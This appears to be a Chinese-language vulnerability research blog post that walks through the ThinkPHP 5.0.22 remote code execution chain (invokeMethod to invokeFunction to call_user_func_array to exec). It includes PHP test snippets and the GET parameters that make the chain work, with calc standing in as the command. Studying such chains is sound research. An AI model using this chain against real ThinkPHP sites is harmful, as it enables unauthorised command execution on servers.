本次我们继续以漏洞挖掘者的视角,来分析thinkphp的RCE
在调用入口函数:/ThinkPHP_full_v5.0.22/public/index.php 时
发现了框架底层调用了\thinkphp\library\think\App.php的app类中的incokeMethod方法
?注意传递的参数,ReflectionMethod接受的参数。如果是数组的形式, 那么参数1是这个类的object,参数2是object的方法。如此就可以调用到index类的index方法
?下面是整个调用链
那么现在思考incokeMethod方法接受的参数是否为为一个可控变量呢,如果可控是不是就意味着我们可以执行任意类中的任意funtion了。这里我们还不能直接调用system,exec这些函数,因为它们不属于任何类,它是一个全局函数。尝试找一下类中的敏感函数
恰好的是,就在app类中存在一个敏感的函数invokeFunction
下面给出一个ReflectionFunction的反射示例
function sum($a, $b) {
return $a + $b;
}
class Example {
public static function bindParams($reflect, $vars) {
$args = [];
foreach ($reflect->getParameters() as $param) {
$name = $param->getName();
if (isset($vars[$name])) {
$args[] = $vars[$name];
} else {
$args[] = $param->getDefaultValue();
}
}
return $args;
}
public static function executeFunction($function, $vars) {
$reflect = new \ReflectionFunction($function);
$args = self::bindParams($reflect, $vars);
// 记录执行信息
self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');
return $reflect->invokeArgs($args);
}
}
$vars = array(
'a' => 5,
'b' => 10,
);
$result = Example::executeFunction('sum', $vars);
echo $result; // 输出 15
在这个示例中ReflectionFunction函数没有牵扯到类,sum是一个全局函数。如此我们现在可以尝试反射条用system函数了,
下面是经过我测试的反射调用exec,它可以弹出计算机
<?php
$reflection = new ReflectionFunction('exec');
echo $reflection->getName() . "\n"; // 输出函数名
$params = $reflection->getParameters();
foreach ($params as $param) {
echo "-----"."参数:" . $param->getName() . "\n";
}
$args = [calc];
$result = $reflection->invokeArgs($args);
//echo "结果:" . $result . "\n";
?>
按照这个思路,我就在invokeFunction中让参数$function='exec' 让参数$vars = [calc],就可以执行命令了,不过在此之前看看它的bindParams逻辑
?跟进getParameters 继续看调用逻辑
?看到这里原有的设定就遇到了问题,因为这个参数绑定会遍历函数的参数名,像我们之前想调用的exec函数,其函数原型为
exec(string $command, array &$output = null, int &$return_var = null): string|false
?$reflect->getParameters() as $param 一定会依次得到command? - output -? return_var
如还想调用exec,那参数vars 必须写上如下形式
$reflection = new ReflectionFunction('exec');
$vars = [calc,null,null];
$result = $reflection->invokeArgs($vars);
以上本地测试还行,php正确接解析了null 然而在web中我们传递的参数大多为字符串,除非后端单独处理,否则我们想传递一个null类型的参数,几乎是不可能的,只能换其他的调用函数了,要执行系统命令,还要避开参数null这样的类型。system函数就不行有null类型
有没有我们需要的这严的函数呢 !还真有一个,它就是call_user_func_array函数
它的原型为
call_user_func_array(callable $callback, array $param_arr): mixed
?再次本地测试
<?php
$reflection = new ReflectionFunction('call_user_func_array');
$vars = [exec,[calc]];
var_dump($vars);
$result = $reflection->invokeArgs($vars);
?>
如此我用参数绑定的机制把exec 绑定在参数callback 把[calc]绑定在param_arr,通过$reflection->invokeArgs我们成功调用了calc (反射类似调用了call_user_func_array('exe',[calc])),null的问题得到完美解决。
回顾一下rce成立的条件
invokeMethod调用invokeFunction?
invokeFunction调用call_user_func_array
call_user_func_array调用exec
代码大致长这样样子
invokeMethod([对象,方法],参数1)
--------这里的对象对象要app类对象方法是invokeFunction?
-------参数1为一个数组[call_user_func_array,参数2]
这样就可调用call_user_func_array,我们将参数设置为[exec,[calc]] 就可以执行任意命令了。
接下来把重点放到参数可控上,如果我们使参数可控那么RCE漏洞就成立了?
首先看调用了invokeMethod的地方
该段代码位于app类的module方法中,
看一看call是怎么来的
$call是一个数组符合我们的预期,我们要把这个instance换成app对象,action换成invokeFunction。
继续向上分析?instance怎么得来的
?继续分析controller怎么得到的
?这个result参数参数得来的,那就让result为一个数组? 让其$result[1]=app类路径。
?如此参数$call的instance就解决了,接下来看action
?全局搜索action_suffix发现这个值为空,不影响action,继续分析actionName
actionName的是result数组索引2获取的,那好在传递module函数参数时,让result为一个数组? 让其$result[2]=invokeFunction
如此$call的问题全部解决,看看剩下的$vars
这里放上找vars是空的啊,不要着急。既然vars向上找没有找到,那么在想向下仔细找找,是不是在调用的过程中被赋值。
向下走到invokeMethod方法中
bindParams对vars进行了处理?跟进去看看
全局搜索url_param_type,发现它为0 ,也就说我们会走到param方法,执行完毕后更新vars值
之后返回给变量$args。
进入param中
request对象中的param成员,存储的是我们get参数的内容param可以写成我们构造的[call_user_func_array,参数2],它之后被返回了
在input方法中他会过滤一些值
之后返回data这个数组
?
?好!现在根据我们的猜想get传参function=call_user_func_array&vars[0]=exec&vars[1][]=calc
就可以上让request对象的param成员存储[call_user_func_array,参数2] 参数2是[exec,[calc]]
由此在调用invokeFunction之前$args就准备好了。?$vars的问题解决了
现在目光继续放在module 这个函数,根据之前分析的让result为一个数组? 让其$result[1]=app类路径。让其$result[2]=invokeFunction
继续向上分析,exec会根据dispatch的type不同而调用module函数
传参是dispatch的module重点关注它
一样的思路,在app类的run方法中最后会执行exec方法
执行exec方法之前,它会初始dispatch 这个对象
?我们跟进routecheck方法,重点关注成员module
result为我们准备返回值,request->path将url中?s= 之后的内容取了出来
这里注解提示了我们路由访问的规则,可以参考下,
这里depr="/"后面的controller_auto_search 是false
进入parseurl分析,在parseurl 最后的返回中出现了module成员 这正是我们想要的
重点分析route是怎么出来的
其实这里我们就可以根据手册说明
尝试把controller修改为我们的app类地址,action设置为?invokeFunction,module可以设置成index,如果没有达到预期可以在调试
那么app的类地址是什么呢, 如下写成think\app即可
下面就是调试版
跟如parseurlpath方法?
?这里的返回值是准备好的以“/”切分的数组,之后分别赋给module controller action
如此参数的确可控,RCE漏洞所有条件成立
本次漏洞研究结束
赋值poc
?